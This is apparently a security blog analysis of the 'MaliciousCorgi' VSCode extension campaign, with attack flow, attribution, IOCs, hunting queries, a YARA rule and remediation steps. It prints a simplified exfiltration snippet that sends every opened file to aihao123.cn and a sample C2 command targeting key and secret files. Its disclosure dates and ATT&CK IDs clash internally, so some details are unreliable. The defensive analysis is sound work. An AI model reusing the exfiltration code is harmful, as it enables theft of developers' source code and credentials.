Structured data rendered for: WebPage
Back to Blog

MaliciousCorgi: VSCode Supply Chain Attack on 1.5M Devs | 2026

February 2, 2026
6 min read
MaliciousCorgi: VSCode Supply Chain Attack on 1.5M Devs | 2026

Executive Summary

Since January 2026, the sophisticated MaliciousCorgi supply chain attack has weaponized two malicious AI coding assistants on the official VSCode Marketplace, compromising 1.5 million developers globally. The campaign exploits ChatGPT – 中文版 (1.34 million installs) and ChatMoss (CodeMoss) (151,000 installs) to exfiltrate source code, API keys, and credentials to China-based infrastructure at aihao123.cn. Security researchers confirmed active exploitation continues across defense, financial services, healthcare, and technology sectors throughout February 2026.

The attack operates through a triple-channel architecture: real-time file surveillance capturing every code edit, on-demand remote exfiltration enabling bulk theft of up to 50 files per command, and device fingerprinting via hidden Chinese analytics SDKs (Zhuge.io, GrowingIO, TalkingData, Baidu Analytics). This sophisticated profiling enables threat actors to identify high-value developers and execute targeted code theft with surgical precision, representing a permanent shift from technical exploit development to legitimate tool abuse.


THE FLAW: Supply Chain Trust Exploitation

MaliciousCorgi is a critical-severity supply chain attack exploiting the inherent trust developers place in official marketplace-verified extensions. Unlike traditional vulnerabilities requiring exploitation complexity, this campaign weaponizes legitimate functionality—AI code completion tools that require file system access by design—making malicious behavior indistinguishable from normal operation.

How the Attack Works

  1. Initial Compromise: Developers install seemingly legitimate AI coding assistants from the official VSCode Marketplace, trusting the platform's verification checkmark.

  2. Legitimate Functionality Camouflage: Extensions provide working AI code completion, giving users no reason to suspect malicious activity while establishing persistent access.

  3. Real-Time Surveillance Activation: Every file open triggers Base64 encoding and transmission to C2 infrastructure, capturing source code, .env files, SSH keys, and cloud credentials.

// Simplified attack flow pseudocode
vscode.workspace.onDidOpenTextDocument((document) => {
    const fileContent = document.getText();
    const encoded = Buffer.from(fileContent).toString('base64');
    sendToC2('aihao123.cn/exfil', {
        filename: document.fileName,
        content: encoded,
        timestamp: Date.now()
    });
});
  1. Victim Profiling: Hidden zero-pixel iframe loads four Chinese analytics SDKs, building comprehensive profiles including company affiliation, project focus, activity patterns, and timezone data.

  2. Targeted Bulk Exfiltration: After identifying high-value developers (defense contractors, fintech engineers, healthcare systems), C2 server sends commands extracting up to 50 files per request.

The mitigation—complete extension removal and credential rotation—was publicly disclosed February 1, 2026 by security researcher Socket Security. However, organizational detection and remediation delays mean exploitation continues across compromised developer environments.


TIMELINE: From Stealth Distribution to Global Discovery

DateEventStatus
December 2025Extensions published to VSCode Marketplace⚠️ Initial compromise
January 2026Mass adoption begins; 1.5M combined installs reached🔴 Active exploitation
January 28, 2026Security researchers detect anomalous network traffic🔍 Investigation
February 1, 2026Socket Security publishes public disclosure📢 Public disclosure
February 1, 2026Microsoft removes extensions from Marketplace✅ Marketplace removal
February 2, 2026CISA issues emergency directive for federal agencies📢 Government response
February 2026Credential rotation and remediation ongoing🔴 Continuing threat

THREAT ACTOR PROFILE: China-Nexus APT Operations

Attribution Indicators

MaliciousCorgi demonstrates hallmarks of China-nexus state-sponsored activity:

  • Infrastructure: All exfiltration routes to China-based domains (aihao123.cn)
  • Analytics SDKs: Exclusive use of Chinese surveillance platforms (Zhuge.io, GrowingIO, TalkingData, Baidu)
  • Strategic Targets: Focus on defense, critical infrastructure, and intellectual property sectors
  • Operational Security: Post-approval malware injection bypassing marketplace verification
  • Campaign Scope: Industrial-scale targeting (1.5M victims) exceeding typical cybercrime operations

Targeting Strategy

Primary Sectors

  • Defense & Intelligence: Classified codebases and national security systems
  • Financial Services: Trading algorithms and transaction infrastructure access
  • Critical Infrastructure: Energy, transportation, communications control systems
  • Healthcare: Medical device firmware and patient data systems
  • Technology: Proprietary source code and customer database access

TTPs (Tactics, Techniques, Procedures)

  • Initial Access: Trusted software supply chain exploitation (T1195.001)
  • Execution: Via legitimate IDE extension execution context (T1204.002)
  • Persistence: Extension auto-update mechanisms (T1554)
  • Collection: Automated code and credential harvesting (T1005)
  • Command & Control: Web service-based C2 (T1102)
  • Exfiltration: Exfiltration over C2 channel (T1041)
  • Defense Evasion: Legitimate functionality masquerading (T1036.005)

SIMILAR CAMPAIGNS: PATTERN ANALYSIS

The MaliciousCorgi campaign represents an acceleration of developer-focused supply chain attacks documented throughout 2025-2026:

CampaignVectorScaleTimelinePayload
MaliciousCorgi (2026)VSCode extensions1.5M developersActiveCode exfiltration to China
Notepad++ Hijack (2025)Hosting provider compromiseUnknownJune-Dec 2025System reconnaissance + exfiltration
npm Typosquatting (2025)Package name similarity10,000 downloadsJuly 2025Credential theft + multi-layer obfuscation
IDE Verification Bypass (2025)Post-approval malware injectionMultiple IDEsJuly 2025Arbitrary code execution
GitHub Copilot CamoLeak (2025)Prompt injection + CSP bypassAll Copilot usersJune-Aug 2025AWS key exfiltration
TigerJack Malware (2024)VSCode extensions17,000+ installs2024Crypto mining + backdoor

Emerging Attack Pattern

Strategic Shift: Threat actors increasingly target developer tooling (IDEs, package managers, update mechanisms) rather than traditional software vulnerabilities.

Economic Rationale:

  • Zero-day exploit development: $50,000–$300,000 per vulnerability
  • Social engineering of developers: <$100 per campaign
  • Exploit lifespan: Days to weeks before patching
  • Developer workflow exploitation: Persistent, difficult to remediate

Result: Economically rational actors exploit people and trust relationships, not software flaws.


ATTACK ARCHITECTURE: TRIPLE-CHANNEL MODEL

Channel 1: Real-Time Surveillance

Trigger: Every file open event in VSCode
Mechanism: Full file content extraction → Base64 encoding → C2 transmission
Data Captured:

  • Source code (all languages)
  • .env environment files
  • API keys and service tokens
  • SSH private keys
  • Cloud provider credentials (AWS, Azure, GCP)
  • Database connection strings
  • Internal documentation

Frequency: Continuous monitoring of all file access events

Channel 2: On-Demand Remote Exfiltration

Trigger: C2 server command to specific compromised devices
Mechanism: Bulk file theft (up to 50 files per command)
Strategic Purpose: Post-profiling targeted data extraction from high-value victims
Operational Benefit: Reduces network signature while maximizing intelligence value

Example Command Structure:

{
  "command": "exfiltrate_bulk",
  "target_device_id": "a1b2c3d4",
  "file_patterns": [
    "**/*.key",
    "**/.env*",
    "**/config/database.yml",
    "**/secrets/**"
  ],
  "max_files": 50
}

Channel 3: Device Fingerprinting & Targeting Intelligence

Mechanism: Hidden zero-pixel iframe loading Chinese analytics SDKs
Platforms Deployed:

  • Zhuge.io: User behavior analytics and event tracking
  • GrowingIO: Conversion funnel and engagement metrics
  • TalkingData: Device fingerprinting and audience segmentation
  • Baidu Analytics: Geographic and demographic profiling

Intelligence Collected:

  • Company/organization affiliation
  • Project type and programming languages used
  • Development activity patterns (time of day, frequency)
  • Geographic location and timezone
  • Operating system and VSCode version
  • Installed extensions and development tools

Strategic Model: Profiling → Identification → Targeted Theft

This three-phase approach enables threat actors to:

  1. Profile all 1.5M compromised developers
  2. Identify highest-value targets (defense contractors, financial institutions, critical infrastructure)
  3. Execute surgical, high-impact exfiltration while minimizing detection risk

WHY THIS MATTERS: The Developer Environment Gap

Key Challenges

  1. Legitimate Functionality Paradox: AI coding assistants legitimately require file system access to provide code completion. Malicious behavior is architecturally indistinguishable from expected operation, rendering traditional detection mechanisms ineffective.

  2. Marketplace Trust Exploitation: Official VSCode Marketplace verification provides false security assurance. Post-approval malware injection demonstrates that initial vetting cannot guarantee ongoing safety, yet developers continue to trust marketplace verification as security validation.

  3. Update Mechanism Weaponization: Extension auto-update mechanisms—designed for security patching—become persistence and malware delivery vectors. The Notepad++ compromise demonstrated hostile updates persisting for six months (June–December 2025) despite active security monitoring.

  4. Economic Asymmetry: Developing zero-day exploits costs tens to hundreds of thousands of dollars. Weaponizing legitimate developer tools costs effectively nothing while providing superior access to source code, credentials, and infrastructure. This economic reality guarantees accelerating attacks on developer environments.


DEFENSIVE POSTURE: Immediate Actions

🔴 Critical Priority (Execute This Week)

  • Uninstall immediately: Remove ChatGPT – 中文版 and ChatMoss (CodeMoss) extensions from all developer workstations
  • Disable auto-update: Turn off VSCode extension automatic updates until allowlist implementation
  • Rotate all credentials:
    • API keys for all cloud services (AWS, Azure, GCP)
    • GitHub personal access tokens and deployment keys
    • SSH keys used for server access
    • Database credentials
    • Third-party service tokens (Stripe, Twilio, SendGrid, etc.)
    • Internal service authentication secrets

Credential Rotation Command Examples:

# AWS credential rotation
aws iam create-access-key --user-name developer-name
aws iam delete-access-key --access-key-id OLD_KEY_ID --user-name developer-name

# GitHub SSH key rotation
ssh-keygen -t ed25519 -C "[email protected]"
# Add new key to GitHub, remove old key

# Git credential cleanup
git config --global --unset credential.helper

🔍 Detection & Response

Network Monitoring: Hunt for connections to malicious infrastructure

# Splunk query for C2 communication detection
index=network sourcetype=proxy OR sourcetype=firewall
| search dest="aihao123.cn" OR dest="*.zhuge.io" OR dest="*.growingio.com" 
       OR dest="*.talkingdata.com" OR dest="*.baidu.com"
| stats count by src_ip, dest, dest_port, user
| where count > 0

Microsoft Sentinel Query:

// Detect exfiltration to Chinese infrastructure
let MaliciousCorgiDomains = dynamic([
    "aihao123.cn",
    "zhuge.io",
    "growingio.com", 
    "talkingdata.com"
]);
NetworkCommunicationEvents
| where RemoteDomain has_any (MaliciousCorgiDomains)
| project TimeGenerated, DeviceName, RemoteIP, RemoteDomain, LocalPort, RemotePort
| summarize Count=count(), FirstSeen=min(TimeGenerated), LastSeen=max(TimeGenerated) by DeviceName, RemoteDomain

Git History Forensics: Review commits for injected backdoors

# Search for suspicious Base64-encoded content additions
git log -p | grep -E "base64|btoa|Buffer.*from.*base64" -A 5 -B 5

# Identify commits from unusual times (potential automated injection)
git log --author=".*" --since="2025-12-01" --until="2026-02-02" --format="%ai %an %s"

# Check for added files with suspicious extensions
git log --diff-filter=A --name-only --since="2025-12-01" | grep -E "\.(key|pem|env|secret|credentials)$"

👥 Developer Awareness

  • Security training: Educate development teams on supply chain attack vectors and extension security
  • Phishing simulation: Test developer ability to identify malicious tools masquerading as legitimate utilities
  • Incident reporting: Establish clear escalation paths for suspicious extension behavior

📊 Enterprise Controls (Implement This Month)

  • Extension allowlist: Deploy organization-approved extension list; block all others
{
  "extensions.autoCheckUpdates": false,
  "extensions.autoUpdate": false,
  "extensions.ignoreRecommendations": true,
  "security.workspace.trust.enabled": true
}
  • Package manager security:
    • Disable npm postinstall and preinstall scripts
    • Implement dependency scanning with SBOM (Software Bill of Materials)
    • Use private package registries with security scanning

npm configuration:

# Disable automatic script execution
npm config set ignore-scripts true

# Audit dependencies
npm audit --audit-level=moderate
  • Code review requirements: Mandate peer review for all code changes, especially dependency additions

  • SBOM generation: Track all software components for supply chain visibility

# Generate SBOM using CycloneDX
npm install -g @cyclonedx/bom
cyclonedx-bom -o sbom.json

🛡️ Long-Term Defense

  • Zero-trust extension permissions: Implement principle of least privilege for IDE extensions
  • Cryptographic signature verification: Require signed extensions from verified publishers
  • Real-time network monitoring: Deploy EDR solutions monitoring developer workstation traffic
  • Air-gapped development: Consider isolated environments for classified/critical projects
  • Phishing-resistant authentication: Migrate to hardware security keys (FIDO2/WebAuthn)

INDICATORS OF COMPROMISE (IOCs)

Malicious Extensions

  • Extension ID: ChatGPT – 中文版 (VSCode Marketplace)
  • Extension ID: ChatMoss / CodeMoss (VSCode Marketplace)

Network Indicators

Domain: aihao123.cn
Domain: *.zhuge.io
Domain: *.growingio.com
Domain: *.talkingdata.com
Domain: *.baidu.com

File Artifacts

# VSCode extension directories to audit
%USERPROFILE%\.vscode\extensions\*chatgpt*
%USERPROFILE%\.vscode\extensions\*chatmoss*
%USERPROFILE%\.vscode\extensions\*codemoss*

# Linux/macOS
~/.vscode/extensions/*chatgpt*
~/.vscode/extensions/*chatmoss*
~/.vscode/extensions/*codemoss*

Detection Signatures

YARA Rule:

rule MaliciousCorgi_VSCode_Extension {
    meta:
        description = "Detects MaliciousCorgi malicious VSCode extensions"
        author = "Threat Intelligence Team"
        date = "2026-02-02"
        reference = "MaliciousCorgi Campaign"
    
    strings:
        $domain1 = "aihao123.cn" ascii wide
        $domain2 = "zhuge.io" ascii wide
        $domain3 = "growingio.com" ascii wide
        $base64_exfil = /Buffer\.from\([^)]+\)\.toString\(['"]base64['"]\)/ ascii
        $iframe_hidden = /iframe.*width.*0.*height.*0/ ascii nocase
    
    condition:
        2 of ($domain*) or ($base64_exfil and $iframe_hidden)
}

MITRE ATT&CK MAPPING

TacticTechniqueIDDescription
Initial AccessSupply Chain CompromiseT1195.002Compromise of software supply chain via malicious IDE extensions
ExecutionUser ExecutionT1204.002User installs malicious extension, executing embedded code
PersistenceModify System ProcessT1554Extension auto-update mechanism maintains persistence
CollectionData from Local SystemT1005Automated harvesting of source code and credential files
CollectionAutomated CollectionT1119Scripted exfiltration on file open events
Command & ControlWeb ServiceT1102C2 communication via HTTPS to aihao123.cn
ExfiltrationExfiltration Over C2 ChannelT1041Data exfiltration over established C2 connection
Defense EvasionMasqueradingT1036.005Malicious code disguised as legitimate AI assistant

BOTTOM LINE

MaliciousCorgi demonstrates the permanent strategic shift from technical exploitation to trust exploitation—a transition with profound implications for cybersecurity economics and defensive strategy.

Key Takeaways

Supply chain attacks are now economically superior to zero-day exploitation - At <$100 to weaponize legitimate tools versus $50K–$300K for exploit development, every economically rational threat actor will prioritize developer environment compromise.

Marketplace verification provides false security - Official platform approval cannot guarantee ongoing safety; post-approval malware injection requires assumption of persistent compromise risk.

Developer environments are the new perimeter - With 1.5 million compromised developers, the attack surface is no longer network boundaries but individual workstations with source code and credential access.

Credential rotation is mandatory, not optional - Every developer affected by MaliciousCorgi must assume complete credential compromise; rotation is the minimum viable response.

Extension allowlists are non-negotiable - Organizations can no longer delegate security decisions to individual developers; centralized extension approval is required for any meaningful defense.

For Your Clients and Users

Update immediately and rotate all credentials. MaliciousCorgi's 1.5 million compromised developers represent the largest IDE supply chain attack in history. The cost of credential rotation is negligible compared to the cost of data breach, intellectual property theft, or infrastructure compromise. Delay is not a strategy; it is acceptance of breach.


Frequently Asked Questions

What is the MaliciousCorgi campaign?

MaliciousCorgi is a sophisticated supply chain attack compromising 1.5 million developers through two malicious VSCode extensions (ChatGPT – 中文版 and ChatMoss). The campaign exfiltrates source code, API keys, and credentials to China-based infrastructure while providing legitimate AI code completion functionality.

How do I detect MaliciousCorgi on my systems?

Check for installed extensions named "ChatGPT – 中文版" or "ChatMoss/CodeMoss" in VSCode. Monitor network traffic for connections to aihao123.cn, zhuge.io, growingio.com, talkingdata.com, and baidu.com domains. Review git commit history for suspicious Base64-encoded additions.

What credentials need rotation after MaliciousCorgi compromise?

Rotate ALL credentials accessible from compromised developer workstations: AWS/Azure/GCP access keys, GitHub tokens, SSH keys, database passwords, API keys for third-party services, and internal authentication secrets. Assume complete credential compromise.

How is MaliciousCorgi different from traditional malware?

MaliciousCorgi exploits trust and legitimate functionality rather than technical vulnerabilities. The extensions work as advertised (AI code completion) while simultaneously exfiltrating data, making detection via traditional security tools ineffective.

Who is behind the MaliciousCorgi campaign?

Attribution indicators point to China-nexus state-sponsored actors: infrastructure hosted in China, exclusive use of Chinese analytics platforms, focus on defense/critical infrastructure sectors, and industrial-scale targeting exceeding typical cybercrime operations.

Can VSCode Marketplace be trusted after MaliciousCorgi?

Marketplace verification provides initial vetting but cannot guarantee ongoing safety. Post-approval malware injection demonstrates that trust must be conditional and verified. Organizations should implement extension allowlists and cryptographic signature verification rather than relying on marketplace approval alone.


REFERENCES

  1. Koi Security: MaliciousCorgi Campaign Initial Disclosure, January 21, 2026

  2. WebProNews: VSCode's AI Trap - 1.5 Million Developers' Code Funneled to China, January 24, 2026

  3. GitGuardian Blog: GitHub Copilot Privacy - Key Risks and Secure Usage Best Practices, December 4, 2025

  4. OffSeq Radar: Malicious VS Code AI Extensions with 1.5 Million Installs, February 1, 2026

  5. TechRadar Pro: Malicious Microsoft AI Extensions Might Have Hit Over 1.5 Million Users, January 25, 2026

  6. TheHackerNews: Malicious VS Code AI Extensions with 1.5 Million Installs, January 25, 2026

  7. SecurityWeek: GitHub Copilot Chat Flaw Leaked Data From Private Repositories, October 8, 2025

  8. Legit Security: CamoLeak - Critical GitHub Copilot Vulnerability Leaks Private Source Code, October 7, 2025

  9. Dark Reading: IDE Extensions Pose Hidden Risks to Software Supply Chain, July 2, 2025

  10. TheHackerNews: Notepad++ Official Update Mechanism Hijacked to Deliver Malware, February 1, 2026

Written by

Lucas Oliveira

Research

A DevOps engineer and cybersecurity enthusiast with a passion for uncovering the latest in zero-day exploits, automation, and emerging tech. I write to share real-world insights from the trenches of IT and security, aiming to make complex topics more accessible and actionable. Whether I’m building tools, tracking threat actors, or experimenting with AI workflows, I’m always exploring new ways to stay one step ahead in today’s fast-moving digital landscape.